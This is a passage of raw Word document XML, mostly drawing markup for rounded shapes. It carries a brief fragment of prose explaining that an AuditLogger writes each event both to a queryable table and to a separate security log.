zAAAA4AkAAAAA&#10;">
                <v:shape id="Shape 2117" o:spid="_x0000_s1027" style="position:absolute;left:9334;width:9335;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="9334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Yn1xwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PS8NA&#10;FMTvBb/D8gre7Cap/4jdBhGiBU9WUY+P7DPZmn2bZjdp9NN3BaHHYWZ+w6yKybZipN4bxwrSRQKC&#10;uHLacK3g7bW8uAXhA7LG1jEp+CEPxfpstsJcuwO/0LgNtYgQ9jkqaELocil91ZBFv3AdcfS+XG8x&#10;RNnXUvd4iHDbyixJrqVFw3GhwY4eGqq+t4NVsP/9eLwMsnv+LJP3p11JZrhaGqXO59P9HYhAUziF&#10;/9sbrSBL0xv4exOfgFwfAQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAIrBifXHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" path="m9525,l923925,v2630,,4875,918,6735,2778c932520,4638,933450,6883,933450,9525r,114300c933450,126454,932520,128687,930660,130547v-1860,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803c930,128687,,126454,,123825l,9525c,6883,930,4638,2790,2778,4650,918,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,933450,133350"/>
                </v:shape>
                <v:shape id="Shape 2120" o:spid="_x0000_s1028" style="position:absolute;left:21240;width:5239;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5238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VYxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LbsIw&#10;EN1X4g7WVGJTFYcsKAoYVNEWCmKTlAOM4mkSNR6ntknC7esFUpdP77/ejqYVPTnfWFYwnyUgiEur&#10;G64UXL4+npcgfEDW2FomBTfysN1MHtaYaTtwTn0RKhFD2GeooA6hy6T0ZU0G/cx2xJH7ts5giNBV&#10;UjscYrhpZZokC2mw4dhQY0e7msqf4moUnIdelvnT6a2T5vCeH3/dYn94UWr6OL6uQAQaw7/47v7U&#10;CtJ5GvfHN/EJyM0fAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAC6jNVjEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l514350,v2630,,4875,918,6735,2778c522945,4638,523875,6883,523875,9525r,114300c523875,126454,522945,128687,521085,130547v-1860,1860,-4105,2791,-6735,2803l9525,133350v-2630,-12,-4875,-943,-6735,-2803c930,128687,,126454,,123825l,9525c,6883,930,4638,2790,2778,4650,918,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,523875,133350"/>
                </v:shape>
                <v:shape id="Shape 2124" o:spid="_x0000_s1029" style="position:absolute;left:3905;top:1714;width:6953;height:1334;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w9xwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvBb/D8oTe6q6hqERXEaHQCkH8c2hvj+wzSZt9G7JbTfrpu4LgcZiZ3zCLVWdrcaHWV441jEcK&#10;BHHuTMWFhtPx7WUGwgdkg7Vj0tCTh9Vy8LTA1Lgr7+lyCIWIEPYpaihDaFIpfV6SRT9yDXH0zq61&#10;GKJsC2lavEa4rWWi1ERarDgulNjQpqT85/BrNexOatp/f5q/ZruvsyxTX0mvPrR+HnbrOYhAXXiE&#10;7+13oyEZJ69wexOfgFz+AwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAIJknD3HAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" path="m9525,l685800,v2630,,4875,930,6735,2778c694395,4638,695325,6896,695325,9525r,114300c695325,126454,694395,128699,692535,130559v-1860,1848,-4105,2779,-6735,2791l9525,133350v-2630,-12,-4875,-943,-6735,-2791c930,128699,,126454,,123825l,9525c,6896,930,4638,2790,2778,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,695325,133350"/>
                </v:shape>
                <v:shape id="Shape 2134" o:spid="_x0000_s1030" style="position:absolute;top:5143;width:2857;height:1429;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8PgxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvQr/D8gredOOfSkldpVQLehA01fsj+5oNZt/G7DZGP323UPA4zMxvmPmys5VoqfGlYwWjYQKC&#10;OHe65ELB8etz8ArCB2SNlWNScCMPy8VTb46pdlc+UJuFQkQI+xQVmBDqVEqfG7Loh64mjt63ayyG&#10;KJtC6gavEW4rOU6SmbRYclwwWNOHofyc/VgFu7oqg3xZny+7Q2Zup/1q267uSvWfu/c3EIG68Aj/&#10;tzdawXg0mcLfm/gE5OIXAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAwffD4MYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m9525,l276225,v2630,,4875,918,6735,2778c284820,4638,285750,6883,285750,9525r,123825c285750,135979,284820,138212,282960,140072v-1860,1860,-4105,2791,-6735,2803l9525,142875v-2630,-12,-4875,-943,-6735,-2803c930,138212,,135979,,133350l,9525c,6883,930,4638,2790,2778,4650,918,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,285750,142875"/>
                </v:shape>
                <v:shape id="Shape 2137" o:spid="_x0000_s1031" style="position:absolute;left:12192;top:5143;width:5810;height:1429;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0cxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9bawIx&#10;FITfC/0P4Qi+FM1qi9WtUbQgFPrgHXw83Rz30s3JkqS6/femIPRxmJlvmOm8NbW4kPOlZQWDfgKC&#10;OLO65FzBYb/qjUH4gKyxtkwKfsnDfPb4MMVU2ytv6bILuYgQ9ikqKEJoUil9VpBB37cNcfTO1hkM&#10;UbpcaofXCDe1HCbJSBosOS4U2NB7Qdn37sco2G+PXy+b9amqJpunhauW69UnS6W6nXbxBiJQG/7D&#10;9/aHVjAcPL/C35v4BOTsBgAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhABsJHRzHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" path="m9525,l571500,v2630,,4875,918,6735,2778c580095,4638,581025,6883,581025,9525r,123825c581025,135979,580095,138212,578235,140072v-1860,1860,-4105,2791,-6735,2803l9525,142875v-2630,-12,-4875,-943,-6735,-2803c930,138212,,135979,,133350l,9525c,6883,930,4638,2790,2778,4650,918,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,58102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2432" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="792622BC" wp14:editId="470F8719">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4180581</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-19288</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2124075" cy="485775"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27022" name="Group 27022"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2124075" cy="485775"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2124075" cy="485775"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2129" name="Shape 2129"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1600200" y="0"/>
                            <a:ext cx="523875" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="523875" h="133350">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="514350" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="516980" y="0"/>
                                  <a:pt x="519225" y="930"/>
                                  <a:pt x="521085" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="522944" y="4638"/>
                                  <a:pt x="523875" y="6896"/>
                                  <a:pt x="523875" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="523875" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="523875" y="126454"/>
                                  <a:pt x="522944" y="128699"/>
                                  <a:pt x="521085" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="519225" y="132407"/>
                                  <a:pt x="516980" y="133338"/>
                                  <a:pt x="514350" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="1" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6896"/>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40" name="Shape 2140"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="342900"/>
                            <a:ext cx="752475" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="752475" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="742950" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="745580" y="0"/>
                                  <a:pt x="747825" y="918"/>
                                  <a:pt x="749685" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="751544" y="4638"/>
                                  <a:pt x="752475" y="6883"/>
                                  <a:pt x="752475" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="752475" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="752475" y="135979"/>
                                  <a:pt x="751544" y="138212"/>
                                  <a:pt x="749685" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="747825" y="141932"/>
                                  <a:pt x="745580" y="142863"/>
                                  <a:pt x="742950"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43" name="Shape 2143"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1028700" y="342900"/>
                            <a:ext cx="1047750" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1047750" h="142875">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1038225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1040855" y="0"/>
                                  <a:pt x="1043100" y="918"/>
                                  <a:pt x="1044960" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1046819" y="4638"/>
                                  <a:pt x="1047750" y="6883"/>
                                  <a:pt x="1047750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1047750" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1047750" y="135979"/>
                                  <a:pt x="1046819" y="138212"/>
                                  <a:pt x="1044960" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1043100" y="141932"/>
                                  <a:pt x="1040855" y="142863"/>
                                  <a:pt x="1038225" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2790" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138212"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="1" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6883"/>
                                  <a:pt x="930" y="4638"/>
                                  <a:pt x="2790" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="4650" y="918"/>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9F89453" id="Group 27022" o:spid="_x0000_s1026" style="position:absolute;margin-left:329.2pt;margin-top:-1.5pt;width:167.25pt;height:38.25pt;z-index:-251394048" coordsize="21240,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&#10;">
                <v:shape id="Shape 2129" o:spid="_x0000_s1027" style="position:absolute;left:16002;width:5238;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5238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FxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/BbsIw&#10;EETvlfgHa5G4VMUhBwopBiFKS0FcQvsBq3hJIuJ1artJ+vd1pUo9jmbmjWa1GUwjOnK+tqxgNk1A&#10;EBdW11wq+Hh/eViA8AFZY2OZFHyTh816dLfCTNuec+ouoRQRwj5DBVUIbSalLyoy6Ke2JY7e1TqD&#10;IUpXSu2wj3DTyDRJ5tJgzXGhwpZ2FRW3y5dRcO47WeT3p+dWmsM+P366+evhUanJeNg+gQg0hP/w&#10;X/tNK0hn6RJ+38QnINc/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAL+ZnMXHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" path="m9526,l514350,v2630,,4875,930,6735,2778c522944,4638,523875,6896,523875,9525r,114300c523875,126454,522944,128699,521085,130559v-1860,1848,-4105,2779,-6735,2791l9526,133350v-2631,-12,-4876,-943,-6736,-2791c930,128699,,126454,1,123825l1,9525c,6896,930,4638,2790,2778,4650,930,6895,,9526,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,523875,133350"/>
                </v:shape>
                <v:shape id="Shape 2140" o:spid="_x0000_s1028" style="position:absolute;top:3429;width:7524;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="7524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oqewgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisIw&#10;FN0L/kO4A+409YE4HaPIDDpuXFhFcHdpbh9Mc1OaaOt8vVkILg/nvVx3phJ3alxpWcF4FIEgTq0u&#10;OVdwPm2HCxDOI2usLJOCBzlYr/q9Jcbatnyke+JzEULYxaig8L6OpXRpQQbdyNbEgctsY9AH2ORS&#10;N9iGcFPJSRTNpcGSQ0OBNX0XlP4lN6OAPrNUXn+nl/9D8tNmyeyi+bpTavDRbb5AeOr8W/xy77WC&#10;yXgW9oc34QnI1RMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBSXoqewgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m9525,l742950,v2630,,4875,918,6735,2778c751544,4638,752475,6883,752475,9525r,123825c752475,135979,751544,138212,749685,140072v-1860,1860,-4105,2791,-6735,2803l9525,142875v-2630,-12,-4875,-943,-6735,-2803c930,138212,,135979,,133350l,9525c,6883,930,4638,2790,2778,4650,918,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,752475,142875"/>
                </v:shape>
                <v:shape id="Shape 2143" o:spid="_x0000_s1029" style="position:absolute;left:10287;top:3429;width:10477;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1047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eGxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawIx&#10;FMTvhX6H8Aq91eyq+Gc1igiCB3vo6qW3x+Y1u7h5WZK4br+9EQo9DjPzG2a9HWwrevKhcawgH2Ug&#10;iCunGzYKLufDxwJEiMgaW8ek4JcCbDevL2sstLvzF/VlNCJBOBSooI6xK6QMVU0Ww8h1xMn7cd5i&#10;TNIbqT3eE9y2cpxlM2mx4bRQY0f7mqprebMK5M3I+YLmJ9Pmp9kn+iV/90ul3t+G3QpEpCH+h//a&#10;R61gnE8n8HyTnoDcPAAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDuRheGxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9526,l1038225,v2630,,4875,918,6735,2778c1046819,4638,1047750,6883,1047750,9525r,123825c1047750,135979,1046819,138212,1044960,140072v-1860,1860,-4105,2791,-6735,2803l9526,142875v-2631,-12,-4876,-943,-6736,-2803c930,138212,,135979,1,133350l1,9525c,6883,930,4638,2790,2778,4650,918,6895,,9526,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1047750,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">is not an audit trail. A single </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AuditLogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> writes every event </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>twice</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: to the table (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>queryable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) and to a separate </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
